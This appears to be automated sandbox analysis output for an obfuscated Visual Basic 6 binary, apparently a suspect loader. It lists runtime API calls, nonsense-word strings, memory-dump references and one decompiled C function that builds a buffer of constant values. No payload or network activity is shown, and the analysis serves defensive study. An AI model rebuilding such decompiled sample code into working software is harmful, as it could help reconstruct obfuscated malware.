__vbaHresultCheckObj.MSVBVM60(00000000,?,0040265C,0000001C), ref: 0041CCD3
__vbaI4Var.MSVBVM60(?), ref: 0041CD02
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,000006FC), ref: 0041CD6E
__vbaFreeObj.MSVBVM60(00000000,00401260,00402330,000006FC), ref: 0041CD88
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041CD9D
#537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CDAA
__vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CDB7
#696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CDBD
#648.MSVBVM60(0000000A), ref: 0041CDE4
__vbaR8FixI4.MSVBVM60(0000000A), ref: 0041CDF6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000700), ref: 0041CE6C
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,00000700), ref: 0041CE86
__vbaFreeVar.MSVBVM60(00000000,00401260,00402330,00000700), ref: 0041CE91
#648.MSVBVM60(0000000A), ref: 0041CEB1
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000704), ref: 0041CF07
__vbaFreeVar.MSVBVM60(00000000,00401260,00402330,00000704), ref: 0041CF21
#648.MSVBVM60(0000000A), ref: 0041CF41
#714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041CF73
#648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041CF93
#564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CFC3
__vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CFDD
__vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D010
__vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D029
__vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041D09A
#581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D0A7
#713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D0B7
__vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D0C4
__vbaFpI4.MSVBVM60 ref: 0041D0E2
__vbaStrCopy.MSVBVM60 ref: 0041D0F8
__vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041D115
__vbaStrMove.MSVBVM60 ref: 0041D156
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D172
#696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D17F
#574.MSVBVM60(00000003), ref: 0041D1A6
__vbaStrMove.MSVBVM60(00000003), ref: 0041D1B3
__vbaR8IntI4.MSVBVM60(00000003), ref: 0041D1BE
__vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041D1FB
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000708), ref: 0041D238
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,00000708), ref: 0041D252
__vbaFreeVar.MSVBVM60(00000000,00401260,00402330,00000708), ref: 0041D25D
#696.MSVBVM60(Kainsmrkernes3), ref: 0041D267
__vbaStrCopy.MSVBVM60 ref: 0041D2E6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,0000070C), ref: 0041D344
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,0000070C), ref: 0041D35E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000710), ref: 0041D3BF
__vbaVarDup.MSVBVM60(00000000,00401260,00402330,00000710), ref: 0041D3F3
#607.MSVBVM60(?,00000065,00000003), ref: 0041D408
__vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D414
__vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D421
__vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D431
__vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D467
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D4A7
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D4BF
#705.MSVBVM60(00000002,00000000), ref: 0041D4E4
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D4F1
__vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D4F7
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000714), ref: 0041D532
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,00000714), ref: 0041D54C
__vbaFreeVar.MSVBVM60(00000000,00401260,00402330,00000714), ref: 0041D557
__vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D561
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000718), ref: 0041D5B4
#525.MSVBVM60(00000067), ref: 0041D5D3
__vbaStrMove.MSVBVM60(00000067), ref: 0041D5E0
#618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D5EC
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D5F9
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D61D
__vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D640
__vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D66E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,0000071C), ref: 0041D6AB
__vbaStrMove.MSVBVM60(00000000,00401260,00402330,0000071C), ref: 0041D6DB
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D705
#564.MSVBVM60(00000005,?), ref: 0041D73D
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041D757
#541.MSVBVM60(?,16:16:16), ref: 0041D777
__vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041D78A
#519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D790
__vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D79D
#648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041D7BD
__vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D809
__vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D816
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000720), ref: 0041D84C
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D882
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041D8A8
#696.MSVBVM60(00402910), ref: 0041D8B5
#696.MSVBVM60(00402958,00402910), ref: 0041D8C6
__vbaStrCopy.MSVBVM60(00402958,00402910), ref: 0041D8DD
__vbaFreeStr.MSVBVM60 ref: 0041D923
__vbaVarMove.MSVBVM60 ref: 0041D94A
__vbaVarMove.MSVBVM60 ref: 0041D96C
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041D980
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041D986
__vbaFreeVar.MSVBVM60(0041DA78), ref: 0041DA20
__vbaFreeStr.MSVBVM60(0041DA78), ref: 0041DA28
__vbaAryDestruct.MSVBVM60(00000000,?,0041DA78), ref: 0041DA3F
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA47
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA4F
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA57
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA5F
__vbaFreeVar.MSVBVM60(00000000,?,0041DA78), ref: 0041DA67
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA72

Strings

RODTEGNENES, xrefs: 0041D0B2
Whiskysourens1, xrefs: 0041D1F6
STRUTTENDE, xrefs: 0041D5E7
Indvi2, xrefs: 0041D651
ASCRY, xrefs: 0041D426
Forretningsbrevet5, xrefs: 0041CB57
Paucify9, xrefs: 0041D0ED
Admiraliteternes1, xrefs: 0041CACE
blaarv, xrefs: 0041CE30
OFFENTLIGHEDSSFRE, xrefs: 0041C8B4
multivalent, xrefs: 0041C57E
=9, xrefs: 0041D2C9
Utrecht8, xrefs: 0041D38A
tril, xrefs: 0041D02F
centralregeringens, xrefs: 0041D2DB
undrede, xrefs: 0041D30A
Lersernes, xrefs: 0041CECB
7:7:7, xrefs: 0041C4F6
eudaemonistical, xrefs: 0041D0A2
SELVFINANSIEREDES, xrefs: 0041D904
Kainsmrkernes3, xrefs: 0041D262
Fdres, xrefs: 0041D64C
Hjortens, xrefs: 0041C441
ADMIRINGLY, xrefs: 0041D17A
Generalisations7, xrefs: 0041D55C
Udstillingslokalet, xrefs: 0041D462
tilskrersaksene, xrefs: 0041CA0D
Bursati, xrefs: 0041C579
CANNIBALEAN, xrefs: 0041C574
16:16:16, xrefs: 0041D76B
Dagvagten, xrefs: 0041C8F8
SOLITRSKAKKEN, xrefs: 0041D656
Skovteknikeren6, xrefs: 0041D8D2
Snoreskrternes8, xrefs: 0041D03B
Odontoma7, xrefs: 0041D30F
replicr, xrefs: 0041C68F
Readjust, xrefs: 0041C528
DUMBFISH, xrefs: 0041D635
Vidnefast, xrefs: 0041CB8F
Benefact6, xrefs: 0041D104

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
API String ID: 1918163132-2023598156
Opcode ID: 79fd0e6a76fd8874aad7265cd8f159aa84f9d5d29769f7b8792a19fea7840374
Instruction ID: a944ac6c03559dab59bd703b7b575cc70f45ea410f8e3fe7685cc86448e7d518
Opcode Fuzzy Hash: 79fd0e6a76fd8874aad7265cd8f159aa84f9d5d29769f7b8792a19fea7840374
Instruction Fuzzy Hash: CAD20875940228ABDB21EF61CD85FDDB7B8AF08304F1080EAE509BB1A1DB785B85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCD0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041FCD0(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				short* _v52;
				char _v64;
				short _v72;
				void* _v76;
				char _v80;
				void* _v84;
				intOrPtr _v92;
				char _v100;
				char _v116;
				intOrPtr _v124;
				char _v132;
				short _v140;
				char _v148;
				char _v164;
				intOrPtr _v172;
				char _v180;
				char* _v204;
				intOrPtr _v212;
				void* _v232;
				char _v236;
				short _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				intOrPtr* _v264;
				signed int _v268;
				signed int _v272;
				signed int _t182;
				short _t184;
				char* _t191;
				short _t193;
				char* _t201;
				short _t204;
				short _t208;
				char* _t210;
				short _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				short _t222;
				signed int _t223;
				signed int _t225;
				signed int _t227;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				short _t237;
				signed int _t238;
				signed int _t240;
				short _t242;
				signed int _t243;
				char* _t245;
				char* _t250;
				signed int _t259;
				signed int _t264;
				signed int _t278;
				signed int _t287;
				signed int _t296;
				signed int _t300;
				signed int _t305;
				void* _t334;
				void* _t336;
				intOrPtr _t337;
				void* _t338;

				_t337 = _t336 - 0xc;
				 *[fs:0x0] = _t337;
				L00401540();
				_v16 = _t337;
				_v12 = 0x4013d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t334);
				L004017B6();
				_push(2);
				_push(0x4025b0);
				_t182 =  &_v64;
				_push(_t182);
				L0040186A();
				if((_t182 | 0xffffffff) != 0) {
					_v92 = 0x80020004;
					_v100 = 0xa;
					_push( &_v100);
					L00401648();
					_v36 = __fp0;
					L00401828();
					_push(0xd4);
					L00401786();
					L0040183A();
				}
				_v124 = 0x80020004;
				_v132 = 0xa;
				_t184 =  &_v132;
				_push(_t184);
				L004017F2();
				_v140 = _t184;
				_v148 = 2;
				_push( &_v148);
				_push( &_v164);
				L004016C0();
				_push(L"Rappees");
				_push(L"Jiggerens");
				_push( &_v100); // executed
				L00401732(); // executed
				_push( &_v100);
				_push( &_v116);
				L00401852();
				_push(0x52);
				_push( &_v164);
				_t191 =  &_v80;
				_push(_t191);
				L00401858();
				_push(_t191);
				L0040162A();
				_v172 = _t191;
				_v180 = 0x8008;
				_push( &_v116);
				_t193 =  &_v180;
				_push(_t193);
				L00401738();
				_v240 = _t193;
				L00401846();
				_push( &_v180);
				_push( &_v116);
				_push( &_v164);
				_push( &_v148);
				_push( &_v132);
				_push( &_v100);
				_push(6);
				L00401840();
				_t338 = _t337 + 0x1c;
				if(_v240 != 0) {
					_v204 = L"PREHISTORICS";
					_v212 = 8;
					L0040184C();
					_push(0xa2);
					_push( &_v100);
					_push( &_v116);
					L00401624();
					_v124 = 0x8d;
					_v132 = 2;
					_push( &_v132);
					_push(0x75);
					_push( &_v116);
					_t250 =  &_v80;
					_push(_t250);
					L00401858();
					_push(_t250);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_push(3);
					L00401840();
					_t338 = _t338 + 0x10;
					if( *0x4223c0 != 0) {
						_v264 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v264 = 0x4223c0;
					}
					_v240 =  *_v264;
					_t259 =  *((intOrPtr*)( *_v240 + 0x14))(_v240,  &_v84);
					asm("fclex");
					_v244 = _t259;
					if(_v244 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v240);
						_push(_v244);
						L004017C8();
						_v268 = _t259;
					}
					_v248 = _v84;
					_t264 =  *((intOrPtr*)( *_v248 + 0xc0))(_v248,  &_v232);
					asm("fclex");
					_v252 = _t264;
					if(_v252 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x40259c);
						_push(_v248);
						_push(_v252);
						L004017C8();
						_v272 = _t264;
					}
					_v72 = _v232;
					L004017C2();
				}
				_v92 = 0x3a;
				_v100 = 2;
				_t201 =  &_v100;
				_push(_t201);
				_push(8);
				_push(L"UNINTERMITTEDLY");
				L004016A2();
				_v124 = _t201;
				_v132 = 0x8008;
				_push( &_v116);
				L004017FE();
				_push( &_v132);
				_t204 =  &_v116;
				_push(_t204);
				L00401738();
				_v240 = _t204;
				_push( &_v116);
				_push( &_v132);
				_push( &_v100);
				_push(3);
				L00401840();
				_t208 = _v240;
				if(_t208 != 0) {
					_push(0xb1);
					L00401756();
					L0040183A();
					_push(_t208);
					L004017EC();
					 *_v52 = _t208;
					L00401846();
					_push(L"MINESTRYGNING");
					L004017EC();
					 *((short*)(_v52 + 2)) = _t208;
					_push(L"2:2:2");
					_push( &_v100);
					L0040182E();
					_push( &_v100);
					_t213 =  &_v80;
					_push(_t213);
					L00401858();
					_push(_t213);
					L004017EC();
					_t278 = 2;
					 *((short*)(_v52 + (_t278 << 1))) = _t213;
					L00401846();
					L00401828();
					_t214 = 2;
					 *((short*)(_v52 + _t214 * 3)) = 0x4cf8;
					_t216 = 2;
					 *((short*)(_v52 + (_t216 << 2))) = 0xe04;
					_t218 = 2;
					 *((short*)(_v52 + _t218 * 5)) = 0x1773;
					_t220 = 2;
					 *((short*)(_v52 + _t220 * 6)) = 0x56a4;
					_v92 = 0x42458a;
					_v100 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_t222 =  &_v100;
					_push(_t222);
					L0040161E();
					L0040183A();
					_push(_t222);
					L004017EC();
					_t287 = 2;
					 *((short*)(_v52 + _t287 * 7)) = _t222;
					L00401846();
					L00401828();
					_t223 = 2;
					 *((short*)(_v52 + (_t223 << 3))) = 0x196e;
					_t225 = 2;
					 *((short*)(_v52 + _t225 * 9)) = 0x15b6;
					_t227 = 2;
					 *((short*)(_v52 + _t227 * 0xa)) = 0x1a5;
					_t229 = 2;
					 *((short*)(_v52 + _t229 * 0xb)) = 0x3c4c;
					_t231 = 2;
					_t232 = _t231 * 0xc;
					 *((short*)(_v52 + _t232)) = 0x3974;
					_push(L"Suppositoriets");
					L004017EC();
					_t296 = 2;
					 *(_v52 + _t296 * 0xd) = _t232;
					_t233 = 2;
					 *((short*)(_v52 + _t233 * 0xe)) = 0x5ff7;
					_t235 = 2;
					 *((short*)(_v52 + _t235 * 0xf)) = 0x758c;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t237 =  &_v100;
					_push(_t237);
					L004017F2();
					_t300 = 2;
					 *((short*)(_v52 + (_t300 << 4))) = _t237;
					L00401828();
					_t238 = 2;
					 *((short*)(_v52 + _t238 * 0x11)) = 0xef8;
					_t240 = 2;
					 *((short*)(_v52 + _t240 * 0x12)) = 0x12b7;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t242 =  &_v100;
					_push(_t242);
					L004017F2();
					_t305 = 2;
					 *((short*)(_v52 + _t305 * 0x13)) = _t242;
					L00401828();
					_t243 = 2;
					 *((short*)(_v52 + _t243 * 0x14)) = 0x3e84;
					_v92 = 0x57f4;
					_v100 = 2;
					_push(L"BESMUDSES");
					_t245 =  &_v100;
					_push(_t245);
					L00401618();
					L0040183A();
					_push(_t245);
					L00401696();
					L0040183A();
					L00401846();
					L00401828();
				}
				asm("wait");
				_push(0x4202fa);
				L00401846();
				L00401846();
				L00401846();
				_v236 =  &_v64;
				_t210 =  &_v236;
				_push(_t210);
				_push(0);
				L0040173E();
				L00401846();
				return _t210;
			}

0x0041fcd3
0x0041fce2
0x0041fcee
0x0041fcf6
0x0041fcf9
0x0041fd00
0x0041fd0f
0x0041fd18
0x0041fd1d
0x0041fd1f
0x0041fd24
0x0041fd27
0x0041fd28
0x0041fd32
0x0041fd34
0x0041fd3b
0x0041fd45
0x0041fd46
0x0041fd4b
0x0041fd51
0x0041fd56
0x0041fd5b
0x0041fd65
0x0041fd65
0x0041fd6a
0x0041fd71
0x0041fd78
0x0041fd7b
0x0041fd7c
0x0041fd81
0x0041fd88
0x0041fd98
0x0041fd9f
0x0041fda0
0x0041fda5
0x0041fdaa
0x0041fdb2
0x0041fdb3
0x0041fdbb
0x0041fdbf
0x0041fdc0
0x0041fdc5
0x0041fdcd
0x0041fdce
0x0041fdd1
0x0041fdd2
0x0041fdd7
0x0041fdd8
0x0041fddd
0x0041fde3
0x0041fdf0
0x0041fdf1
0x0041fdf7
0x0041fdf8
0x0041fdfd
0x0041fe07
0x0041fe12
0x0041fe16
0x0041fe1d
0x0041fe24
0x0041fe28
0x0041fe2c
0x0041fe2d
0x0041fe2f
0x0041fe34
0x0041fe40
0x0041fe46
0x0041fe50
0x0041fe63
0x0041fe68
0x0041fe70
0x0041fe74
0x0041fe75
0x0041fe7a
0x0041fe81
0x0041fe8b
0x0041fe8c
0x0041fe91
0x0041fe92
0x0041fe95
0x0041fe96
0x0041fe9b
0x0041fe9c
0x0041fea6
0x0041feae
0x0041feb6
0x0041feba
0x0041febe
0x0041febf
0x0041fec1
0x0041fec6
0x0041fed0
0x0041feed
0x0041fed2
0x0041fed2
0x0041fed7
0x0041fedc
0x0041fee1
0x0041fee1
0x0041feff
0x0041ff17
0x0041ff1a
0x0041ff1c
0x0041ff29
0x0041ff4b
0x0041ff2b
0x0041ff2b
0x0041ff2d
0x0041ff32
0x0041ff38
0x0041ff3e
0x0041ff43
0x0041ff43
0x0041ff55
0x0041ff70
0x0041ff76
0x0041ff78
0x0041ff85
0x0041ffaa
0x0041ff87
0x0041ff87
0x0041ff8c
0x0041ff91
0x0041ff97
0x0041ff9d
0x0041ffa2
0x0041ffa2
0x0041ffb8
0x0041ffbf
0x0041ffbf
0x0041ffc4
0x0041ffcb
0x0041ffd2
0x0041ffd5
0x0041ffd6
0x0041ffd8
0x0041ffdd
0x0041ffe2
0x0041ffe5
0x0041ffef
0x0041fff0
0x0041fff8
0x0041fff9
0x0041fffc
0x0041fffd
0x00420002
0x0042000c
0x00420010
0x00420014
0x00420015
0x00420017
0x0042001f
0x00420028
0x0042002e
0x00420033
0x0042003d
0x00420042
0x00420043
0x0042004b
0x00420051
0x00420056
0x0042005b
0x00420063
0x00420067
0x0042006f
0x00420070
0x00420078
0x00420079
0x0042007c
0x0042007d
0x00420082
0x00420083
0x0042008a
0x00420090
0x00420097
0x0042009f
0x004200a6
0x004200ad
0x004200b5
0x004200bc
0x004200c4
0x004200cb
0x004200d3
0x004200da
0x004200e0
0x004200e7
0x004200ee
0x004200f0
0x004200f2
0x004200f4
0x004200f6
0x004200f9
0x004200fa
0x00420104
0x00420109
0x0042010a
0x00420111
0x00420118
0x0042011f
0x00420127
0x0042012e
0x00420135
0x0042013d
0x00420144
0x0042014c
0x00420153
0x0042015b
0x00420162
0x0042016a
0x0042016b
0x00420171
0x00420177
0x0042017c
0x00420183
0x0042018a
0x00420190
0x00420197
0x0042019f
0x004201a6
0x004201ac
0x004201b3
0x004201ba
0x004201bd
0x004201be
0x004201c5
0x004201cc
0x004201d3
0x004201da
0x004201e1
0x004201e9
0x004201f0
0x004201f6
0x004201fd
0x00420204
0x00420207
0x00420208
0x0042020f
0x00420216
0x0042021d
0x00420224
0x0042022b
0x00420231
0x00420238
0x0042023f
0x00420244
0x00420247
0x00420248
0x00420252
0x00420257
0x00420258
0x00420262
0x0042026a
0x00420272
0x00420272
0x00420277
0x00420278
0x004202c5
0x004202cd
0x004202d5
0x004202dd
0x004202e3
0x004202e9
0x004202ea
0x004202ec
0x004202f4
0x004202f9

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FCEE
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FD18
__vbaAryConstruct2.MSVBVM60(?,004025B0,00000002,?,?,?,?,00401546), ref: 0041FD28
#593.MSVBVM60(0000000A), ref: 0041FD46
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041FD51
#537.MSVBVM60(000000D4,0000000A), ref: 0041FD5B
__vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 0041FD65
#648.MSVBVM60(0000000A), ref: 0041FD7C
#652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 0041FDA0
#692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FDB3
#522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FDC0
__vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FDD2
#514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FDD8
__vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FDF8
__vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FE07
__vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0041FE2F
__vbaVarDup.MSVBVM60 ref: 0041FE63
#513.MSVBVM60(?,?,000000A2), ref: 0041FE75
__vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 0041FE96
#628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FE9C
__vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FEA6
__vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FEAE
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FEC1
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 0041FEDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 0041FF3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,000000C0), ref: 0041FF9D
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,000000C0), ref: 0041FFBF
#628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 0041FFDD
#670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FFF0
__vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FFFD
__vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 00420017
#525.MSVBVM60(000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 00420033
__vbaStrMove.MSVBVM60(000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 0042003D
#696.MSVBVM60(00000000,000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 00420043
__vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 00420051
#696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 0042005B
#541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 00420070
__vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002), ref: 0042007D
#696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002), ref: 00420083
__vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002), ref: 00420097
__vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002), ref: 0042009F
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004200FA
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420104
#696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042010A
__vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042011F
__vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420127
#696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042017C
#648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004201BE
__vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004201D3
#648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420208
__vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042021D
#651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420248
__vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420252
__vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420258
